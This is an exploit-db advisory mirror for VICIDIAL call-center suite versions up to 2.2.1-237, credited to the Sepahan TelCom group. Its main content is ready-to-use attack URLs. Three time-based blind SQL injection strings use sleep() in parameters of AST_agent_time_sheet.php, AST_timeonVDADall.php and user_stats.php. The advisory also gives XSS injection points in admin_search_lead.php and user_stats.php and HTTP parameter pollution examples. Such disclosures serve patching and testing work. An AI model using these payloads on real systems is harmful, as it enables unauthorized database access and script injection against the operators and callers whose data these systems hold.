VICIDIAL Call Center Suite 2.2.1-237 – Multiple Vulnerabilities

  • 作者: Ertebat Gostar Co
    日期: 2012-09-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/21220/
  • ####################################################################################
    ##
    # ...:::::VICIDIAL call center suite Blind SQL Injection Vulnerability::::.... # 
    ####################################################################################
    
    
    Sepahan TelCom IT Group (septelcom)
    								
    -------------------------------------------------------
    # Date: 2012-09-07
    # Exploit Author: Sepahan TelCom IT Group (septelcom)
    # Vendor Homepage: http://www.vicidial.org
    # Software Link: https://sourceforge.net/project/showfiles.php?group_id=95133&package_id=101320
    #Affected version: <=2.2.1-237
    
    									
    VICIDIAL is a set of programs that are designed to
    interact with the Asterisk Open-Source PBX Phone system
    to act as a complete inbound/outbound call center suite.
    --------------------------------------------------------
    
    									
    I'M hadihadi From Virangar Security Team
    
    special tnx to:MR.nosrati,black.shadowes,MR.hesy
    & all virangar members & all hackerz
    
    greetz to My best friends & partners in septelcom group : Reza Kazemian,Hossein Ghasemi
    
    spl:Z.Khodaee
    
    -------
    exploit:
    
    http://site.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07
    http://site.com/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4
    http://site.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)='
    
    ----
    Sepahan TelCom Network And Security Group (septelcom)
    
    www.septelcom.net
    
    E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net
     
    ####################################################################################
    ##
    # ...:::::VICIDIAL call center suite XSS/HTTP Prameter pollution::::.... # 
    ####################################################################################
    
    
    Sepahan TelCom IT Group (septelcom)
    								
    -------------------------------------------------------
    # Date: 2012-09-07
    # Exploit Author: Sepahan TelCom IT Group (septelcom)
    # Vendor Homepage: http://www.vicidial.org
    # Software Link: https://sourceforge.net/project/showfiles.php?group_id=95133&package_id=101320
    #Affected version: <=2.2.1-237
    
    									
    VICIDIAL is a set of programs that are designed to
    interact with the Asterisk Open-Source PBX Phone system
    to act as a complete inbound/outbound call center suite.
    --------------------------------------------------------
    
    									
    I'M hadihadi From Virangar Security Team
    
    special tnx to:MR.nosrati,black.shadowes,MR.hesy
    & all virangar members & all hackerz
    
    greetz to My best friends & partners in septelcom group : Reza Kazemian,Hossein Ghasemi
    
    spl:Z.Khodaee
    
    -------
    exploit:
    
    XSS :
    
    http://site.com/admin_search_lead.php?alt_phone_search=&DB=1&first_name=lskkuuaj&last_name=lskkuuaj&lead_id=1&list_id=1&log_lead_id=1&log_phone=555-666-0606&phone=555-666-0606&status=1&submit=SUBMIT&user=[XSS]&vendor_id=1
    http://site.com/user_stats.php?user=[XSS]
    --------------
    HTTP Prameter plution:
    
    http://site.com/./user_stats.php?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07{HTPP}
    example : /user_stats.php?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07&hadi685=sep148
    
    http://site.com/admin.php?ADD=3&user=someuser{HTPP}
    example : ./admin.php?ADD=3&user=hadi&sep18=tell15
    
    ----
    Sepahan TelCom Network And Security Group (septelcom)
    
    www.septelcom.net
    
    E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net